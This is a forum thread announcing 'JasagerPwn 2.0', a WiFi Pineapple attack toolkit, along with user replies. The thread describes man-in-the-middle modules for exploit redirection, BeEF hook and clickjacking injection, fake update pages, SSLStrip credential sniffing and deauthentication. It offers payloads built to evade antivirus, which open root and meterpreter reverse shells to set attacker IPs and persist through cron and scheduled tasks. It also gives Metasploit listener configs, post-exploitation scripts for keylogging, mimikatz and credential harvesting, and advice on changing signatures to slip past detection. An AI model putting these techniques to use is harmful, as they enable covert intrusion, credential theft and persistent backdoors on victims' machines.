Jump to content

[Script] JasagerPwn 2.0 - Reborn


leg3nd

Recommended Posts

Disclaimer: This script is intended for LEGAL purposes ONLY. By downloading the following material you agree that the intended use of the previously mentioned is for LEGAL and NON-MALICIOUS purposes ONLY. This means while gaining client side exploits, you have the correct documentation and permissions to do so in accordance with all US and International laws and regulations. Nor I nor any associates at Hak5 condone misuse of this code or its features.

Responsibility Disclosure: Hak5 has no affiliation with this code base. This code is not reviewed or verified by Hak5; therefore they do not take any responsibility for any of this code and its functionality. If you are paranoid (good!) - then look over the code yourself to be safe.

Description
This script is intended to increase attack vector consistency and stability by automating the process. For penetration testers, the most important thing is having a stable and well prepared attack vector - because you only get one chance.
This script provides exactly that, a way to prepare and automate advanced and complex attack vectors in the lab, and then use them in the field.
Screenshot_10192013_12_33_03_PM.jpg
Compatibility / Troubleshooting
Script Requirements: Pineapple [MK4 3.0.0] [MK5 1.0.0] - Debian based Linux.

Tested Configuration: Pineapple MK5 1.0.0, Crunchbang Linux | Kali Linux

  • Battery - Pineapple (Router: wlan0 | ICS: wlan1) -> Alfa (DeAuth)
  • Attacker IPs: (2 man red-team) - 172.16.42.2 172.16.42.3
  • Configuration Picture:
  • 20131019_114608.jpg
  • 20131025_222645.jpg
  • 20131025_222712.jpg

Setting up the Script:

Open up jasagerPwn in your favorite text editor. Look over all the variables in this file and read my comments; they should clearly explain what is what.Adjust the variables based on your pineapple setup. If anything is unclear, feel free to ask me and I can clarify.

After you setup the script, connect to a stable internet connection and run the script - this will prompt you to install dependencies. This will take a few minutes, after that is completed you can connect to the pineapples network (either via wireless or ethernet) and relaunch the script.

Thats it. You should be able to use the attack modules.

Dependencies Installation:
Dependencies will attempt to install automatically if they are not detected on your system, f this fails for you - please look at the src/system_modules/dependencies.sh and just install it yourself. I've tested installation processes on Debian, Crunchbang, and Kali Linux.
Infusion dependencies are also required for attack modules. Please refer to the list of attack modules below and their corresponding "Requirements".
Included Attack Vector Modules
  • browserPwn - Redirect LAN to Metasloits auxiliary module browser_autopwn. This will be detected by AV.
    • Victim Support: Mac OSX, Windows, Linux.
    • Requirements: Metasploit, DNSSpoof Infusion
  • browserPwn iFrame - Inject an invisible iFrame into the victims browsing session that points to metasploit browser_autopwn.
    • Victim Support: Mac OSX, Windows, Linux.
    • Requirements: Metasploit, Strip-N-Inject Infusion
  • BeEf - Inject a BeEf JavaScript hook transparently into victims browsing sessions. This is a form of Man-in-the-browser and will not be detected by AV.
    • ​Victim Support: Mac OSX, Windows, Linux
    • Requirements: Strip-N-Inject Infusion
  • Fake Update - Redirect LAN to a realistic fake update page with a [custom] payload download.
    • Victim Support: Mac OSX, Windows.
    • Requirements: Metasploit, DNSSpoof Infusion
  • Click Jacking - Hijack the entire DOM with an injected <div>. No matter where you click, it downloads a payload.
    • Victim Support: Mac OSX, Windows.
    • Requirements: Metasploit, Strip-N-Inject Infusion
  • Java Applet Injection - Transparently injects an OS agnostic java applet into the victims browsing session.
    • Victim Support: Mac OSX, Windows, Linux.
    • Requirements: Metasploit, Strip-N-Inject Infusion
  • Java Applet Redirect - Redirects users to a Java page with an OS agnostic java applet payload.
    • Victim Support: Mac OSX, Windows, Linux.
    • Requirements: Metasploit, DNSSpoof Infusion
  • SSLStrip - Remove SSL from the victims connections and sniff credentials.
    • Victim Support: Mac OSX, Windows, Linux.
    • Requirements: SSLStrip Infusion
  • Aireplay-ng [local] - DoS APs and try to make them join yours via custom aireplay-ng script on the attacker machine.
    • This script will run aireplay-ng against the AP broadcast, note that this works best if you are closer to the AP than the client
  • MDK3 [local] - Deauths nearby clients from their APs and try to make them join yours via MDK3 from the attacker machine.
    • This script will run MDK3 to deauthenticate clients from an AP directly note that this works best if you are close to the clients. As a result, this will have slightly better average range effectiveness.
Included Payloads (w/ Source & Documentation)
I have included some of my most successful and efficient payloads for your use. One for Mac OSX, and one for Windows - both will completely bypass signature based anti-virus and most behavioral HIPS as well.

Apple_MacOSX_Update.pkg
Description: This is 4 lines of BASH stuck in an apple postinstall script. No signature AV can ever detect this because it uses system commands and contains no binaries in the package.
This will spawn 2 root shells to the following addresses:
172.16.42.2 6446
172.16.42.3 6446
Persistence:
It will also add a persistent backdoor that will spawn these 2 every 3 minutes (sudo crontab -l)
Metasploit Listener:
use exploit/multi/handler
set PAYLOAD generic/shell_reverse_tcp
set LHOST 0.0.0.0
set LPORT 6446
set ExitOnSession false
set AutoRunScript ""
exploit -j
powershell-https.exe
Description: This is an implementation of "Invoke-Shellcode" from Matthew Graeber's PowerSploit modules. It was stripped down then minified and implemented into a standalone python script then compiled into an executable. It is not detect at the time of this writing. If the signature becomes detected, just make a new one.
This will spawn 2 meterpreter shells to the following addresses:
172.16.42.2 587
172.16.42.3 587
Persistence:
It will also add a persistent backdoor to Windows that will these 2 shells every 3 minutes (schtasks /query /tn winupdate)
Metasploit Listener:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 0.0.0.0
set LPORT 587
set SessionCommunicationTimeout 0
set ExitOnSession false
set EXITFUNC process
set AutoRunScript ""
exploit -j
shellcode-tcp.exe
Description: This is a windows meterpreter shell that was encoded into base 64, embedded into a python script that preforms basic shellcode execution, and then compiled into an executable. It is not detect at the time of this writing. If the signature becomes detected, just make a new one with some random data in it.
This will spawn 2 meterpreter shells to the following addresses:
172.16.42.2 587
172.16.42.3 587
Persistence:
It will also add a persistent backdoor to Windows that will these 2 shells every 3 minutes (schtasks /query /tn winupdate)
Metasploit Listener:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 587
set ExitOnSession false
set EXITFUNC thread
set AutoRunScript "migrate -f -k"
exploit -j
Included Resources
I have included a few resources that I find useful on pentests with the pineapple.
  • Metasploit Scripts: These are resource scripts that can be executed from msfconsole or in meterpreter. Creates a nice way to automate post-exploitation at your fingertips. In order to run them use "resource resources/metaspoit_scripts/file_collector.rc".
    • file_collector.rc: Automatically search for documents on the system and download them.
    • enum_app_data.rc: Enumerate passwords and other data from browsers, putty, etc.
    • keylog_recorder.rc: Start a keylogger that will poll and automatically collect keystokes. You can use this then CTRL+Z to background the session.
    • mimikatz.rc: Dump cleartext passwords from memory. Hashses are great, but why deal with cracking when they are sitting in memory in clear text?
    • payload_inject.rc: Inject a meterpreter session into explorer.exe. This is like "duplicate" but you can send it to your red-team and not ever drop a binary on the system.
    • listeners.rc: This is useful for the other members of the red-team not running JasagerPwn. They can just "msfconsole -r listeners.rc" and be ready to receive shells
  • web_clone.sh: This is a simple wget command that I love to use to clone websites for phishing. It will put everything into a single index.html file.
    • Note: If you're preforming a MITM attack then you need to download all the resources that are hot-linked in index.html and then modify them to local, relative paths. This can be tedious but is what I have used to do every template in JasagerPwn
  • airdrop-ng: This was an airdrop-ng attack module that I made before MDK3. I think MDK3 works better so I took it out and plopped it here.
Developing Attack Modules
This script was created in a modular architecture, allowing for relatively simple expansion of attack vectors. Use the "attack_module_example.sh" located in the resources directory for an example reference.
There are just a few requirements when developing the modules:
  1. If you're making a local de-authentication module - use "deauth" or "dos" in the description string.
  2. You must have a "start_myname" and "stop_myname" function in that format (myname is arbitrary).
  3. You must have a unique "title", "description", and "bindings" variables.
  4. I recommend editing the src/system_modules/utility.sh - cleanup() function to cleanup after your module.

Module Submission:

If you develop an attack module that you would like to have added into JasagerPwn, that is great! Just let me know and send me the code. If its a good idea; I'll code review it and add it into the script.

Questions / Problems
Questions: Feel free to ask here or in IRC (irc.hak5.org #pineapple).
Download / Update
Download via Subversion (sudo apt-get install subversion):
Update Script to Latest Revision:
./jasagerPwn -u
Enjoy! :ph34r:
Edited by leg3nd
Link to comment
Share on other sites

  • Replies 71
  • Created
  • Last Reply

Top Posters In This Topic

Was it tested with mk4 by any chance? Should i even try?

Yes sir.

Assuming you're using the 3.0.0 firmware; it should work. It's not going to be officially supported, but I tried to keep it as universal as possible - so all the current functionality will work.

Edited by leg3nd
Link to comment
Share on other sites

Nice one! Thanks! I assume it needs to be ran with at least 2 wlan intefaces available (+possible 3rd to deauth)?

Personally, when I was using it on the MK4 I would just have the internal for the wireless lan and one for providing internet access. The deauth's in this script are done locally from the attacker machine rather than on the pineapple. If you can get 3 interfaces into a MK4, then you could deauth from there as well, but you'll need to manage the power distribution well.

You could also use a 3G dongle for internet access or just not provide internet access at all and use "Fake Update" or "Java Applet Redirect".. up to you.

The MK5 handles the 3 wireless interfaces very well since it has the 2 internal wireless cards and a better power source. If you wanna go that route I would recommend upgrading.

Link to comment
Share on other sites

I was not able to run any of the attacks except for airplay-ng, Every time I select one of the attacks, the menu roles back and nothing happens.

I change the JasegerPwn configuration to the following

my pineapple connects to Kali on eth0

I have an Alfa card setup on wlan0

IP address on Kali 172.16.42.104

Pineapple IP address 172.16.42.1

#!/bin/bash
#
# JasagerPwn [Reborn] - Version 2.x
# Author: Leg3nd @ https://leg3nd.me
#

#------------------------------------------------------------------------------------------
# CONFIGURATION / VARIABLES
#------------------------------------------------------------------------------------------
# [System Information]
deauth_interface="wlan0" # Interface for local deauthentication attacks

# [Pineapple Information]
# Interface connecting to pineapple from this machine
pineapple_interface="eth0"
# Pineapple IP - Must be in 172.16.42.0/24
pineapple_ip="172.16.42.1"
 # SSH Password for pinepple (for remote command execution)
pineapple_password="Access1337"
 # Mac address of pineapple
pineapple_mac="00:13:37:A5:08:EA"

Also the configuration picture link "doesn't work" https://leg3nd.me/cl...d55237c33a391db ;)

Edited by Jmanuel
Link to comment
Share on other sites

Hey Jmanuel, thank you for your feedback,

I'll upload the picture to a non-hardened server. I only allow US visitors to that server.

Although this is not required, I suggest setting a static IP to 172.16.42.2 or 172.16.42.3 as this is out of the default DHCP scope and is what I have hardcoded all the payloads to connect to.

Regarding your issue with the attack modules; your configuration looks correct to me. I tested the script from a default Kali Linux 1.0.2 Live CD and didn't have any issues.

  • Are you using Kali 1.0.2?
  • I added a "debug mode" into the script, if you just "svn up" or "./jasagerPwn -u" and get the update then you can run "./jasagerPwn -d" and then privately send me the log file it will produce.
    • Note this gathers system information (both your machine and the attacker) which is used by the script to assist you with the issue.

I'll be in IRC most the day in #pineapple if you need to chat about the issue. I'm sure we can get it fixed up for you.

Edited by leg3nd
Link to comment
Share on other sites

msfconsole shows no errors, and services all started (via lazykali script)

current setup

internet via wlan0

connection to pineapple on eth0, into PoE Lan IP 172.16.42.2 (no internet on this connection, or on pineapple)

failed to start exploit module multi/browser/*PAYLOADS* on all of them.

Edited by Fira
Link to comment
Share on other sites

EDIT: Nevermind my previous post was incorrect after further testing.

Seems like it's an issue with "msfcli" selecting the modules. I just commited an update that will resolve the issue. Run ./jasagerPwn -u and try again. :)


On a separate note -

Please let me know if other modules are working as intended such as Fake Update and Java Applet Redirect. Obviously none of the code-injection modules (Click Jacking, BeEf, Java Applet Injector) will work because my codeinject infusion is not in the MK5 Pineapple bar yet.

Edited by leg3nd
Link to comment
Share on other sites

EDIT: Nevermind my previous post was incorrect after further testing.

Seems like it's an issue with "msfcli" selecting the modules. I just commited an update that will resolve the issue. Run ./jasagerPwn -u and try again. :)


On a separate note -

Please let me know if other modules are working as intended such as Fake Update and Java Applet Redirect. Obviously none of the code-injection modules (Click Jacking, BeEf, Java Applet Injector) will work because my codeinject infusion is not in the MK5 Pineapple bar yet.

Leg3nd, I'm using the Vmware image, Kali 1.0

I update JasagerPwn to rev. 11 and ran ./jasagerPwn -d, but all I see is this message "-----Pineapple system information-----"

I'm still not able to run any of the attacks including fake update, and java applet redirect.

I'm on IRC

Link to comment
Share on other sites

Leg3nd, I'm using the Vmware image, Kali 1.0

I update JasagerPwn to rev. 11 and ran ./jasagerPwn -d, but all I see is this message "-----Pineapple system information-----"

I'm still not able to run any of the attacks including fake update, and java applet redirect.

I'm on IRC

Sorry I keep missing you online. I'll be on IRC most the day to discuss your issue.

I am still unable to reproduce your problem with your setup (Kali in VMware). Please email me the debug text file that was produced when you ran "./jasagerPwn -d" (dgriffin831@gmail.com). I will look at the information and see if I can diagnose your problem.

I would suggest trying the script on a new installation of Kali Linux. You can even do it from a Live CD/ISO. If it works on a Live CD/ISO then we know it's something that was modified in your Kali Linux VM.

Link to comment
Share on other sites

Hi, can you post the source code for the inject.exe? Another noob question, how to change signature of the .exe file if it gets detected in the future?

Thanks again for your release :)

The source code is included. It is in "resources/meterpreter_inector" - reference the README file if you want to compile your own.

To change the signature, just add a variable that does nothing. For example: var1="STUFF12345" - then recompile.

Link to comment
Share on other sites

EDIT: Nevermind my previous post was incorrect after further testing.

Seems like it's an issue with "msfcli" selecting the modules. I just commited an update that will resolve the issue. Run ./jasagerPwn -u and try again. :)

I can confirm that the errors I had have now been fixed :)

thanks mate!

and FYI using a MKIV

:)

Link to comment
Share on other sites

I don't know if this has been thought of already, but I found this on teh forums :

https://forums.hak5.org/index.php?/topic/30398-payload-the-fastest-meterpreter-shell-youll-ever-get/

and then this :

http://www.pentestgeek.com/2013/09/18/invoke-shellcode/

could something like this be included that generates powersploit shells?



EDIT....

ahhh key board / ducky access required...

Edited by Fira
Link to comment
Share on other sites

I don't know if this has been thought of already, but I found this on teh forums :

https://forums.hak5.org/index.php?/topic/30398-payload-the-fastest-meterpreter-shell-youll-ever-get/

and then this :

http://www.pentestgeek.com/2013/09/18/invoke-shellcode/

could something like this be included that generates powersploit shells?

EDIT....

ahhh key board / ducky access required...

Actually - the keyboard is not required. Code execution is the only thing that is theoretically required. For example, theres nothing stopping you from running powershell from inside of python (with subprocess) and then compiling that python script into a raw executable. I'll try and throw something that does this together and add it into the resources - should be pretty straight forward.

Both Java Applet attacks utilize this powershell injection technique already to spawn reverse_tcp shells. The only difference is that your links are using reverse_https - which does have some serious benefits in terms of stealth and IPS evasion. I'll modify my code to use HTTPS sometime this week.

If you wanna try modifying them yourself then edit the following files:

  • src/powershell_payload.py - Edit the variable on the top from "windows/meterpreter/reverse_tcp" to "windows/meterpreter/reverse_https"
  • src/attack_modules/javaapplet.sh - Edit the metasploit script that is being echoed out (the very bottom listener that uses ps_win_port) from "windows/meterpreter/reverse_tcp" to "windows/meterpreter/reverse_https"

That should be it - now the applets will use that exact same technique with reverse_https. Keep in mind I am just doing this in my head - I haven't actually tested it.

At the end of the day, both the inject.exe (meterpreter_injector) and the powershell technique achieve the same goal: an AV safe meterpreter shell that bypasses most IPS systems. Both have pros and cons. Like I said before, I'll make another payload that uses the powershell technique compiled into a binary and add it to resources so you can pick your poison.

Edited by leg3nd
Link to comment
Share on other sites

The source code is included. It is in "resources/meterpreter_inector" - reference the README file if you want to compile your own.

To change the signature, just add a variable that does nothing. For example: var1="STUFF12345" - then recompile.

Damn i'm so impressed that inject.exe is so deadly! I've ran it and it got detected by AVG but only after it was in memory, so the antivirus couldn't really do anything.

Btw in the metasploit listener you are missing the command "use exploit/multi/handler" .

I would also add this command "set InitialAutoRunScript migrate -f" because explorer.exe wasn't stable enought and the sessions would die after few seconds (in my VM at least).

Thanks for your wonderful tool !

Link to comment
Share on other sites

Damn i'm so impressed that inject.exe is so deadly! I've ran it and it got detected by AVG but only after it was in memory, so the antivirus couldn't really do anything.

Btw in the metasploit listener you are missing the command "use exploit/multi/handler" .

I would also add this command "set InitialAutoRunScript migrate -f" because explorer.exe wasn't stable enought and the sessions would die after few seconds (in my VM at least).

Thanks for your wonderful tool !

This is very true.

Generally when performing memory heavy operations in meterpreter, it will cause explorer.exe to crash. In order to get around this I generally use the following listener:

set PAYLOAD windows/meterpreter/reverse_tcp
set EXITFUNC process
set LHOST 0.0.0.0
set LPORT 587
set ExitOnSession false
set InitialAutoRunScript ""
set AutoRunScript "multiscript -rc /tmp/autorun.rc"
exploit -j

/tmp/autorun.rc should contain the following

duplicate -r 172.16.42.2 -p 8443
migrate -f

This will immediately send you another shell to ensure you can keep a connection to the victim; and then will auto-migrate out of explorer.exe.

As requested by Fira - I'll be making another payload that uses powershell injection. It will not have these limitation since it will have less memory manipulation. ^_^ The only downside to powershell injection is that it leaves processes running that the victim can kill from task manager.

Edited by leg3nd
Link to comment
Share on other sites

I don't know if this has been thought of already, but I found this on teh forums :

https://forums.hak5.org/index.php?/topic/30398-payload-the-fastest-meterpreter-shell-youll-ever-get/

and then this :

http://www.pentestgeek.com/2013/09/18/invoke-shellcode/

could something like this be included that generates powersploit shells?

EDIT....

ahhh key board / ducky access required...


As requested and promised - I just added the Matthew Graeber's powershell meterpreter reverse_https payload injection. I included both the source code I created as well as a pre-prepared binary for 172.16.42.2 and 172.16.42.3. As with all other included payloads - a 3 minute backdoor will also be installed for persistence.

Rather than downloading it from an external website (as in the ducky attack), I went ahead and took PowerSploit and ripped out all the un-needed code then minified it to be 1 line. Now that entire script is stored inside the python code and then compiled into an executable for portability.

I've been trying to get it to work on the pineapple and been having issues with it giving "Command not found" in meterpreter. It does however work fine on my other network. If anyone can test it and let me know if it works for them it would be greatly appreciated.

Edited by leg3nd
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.

×
×
  • Create New...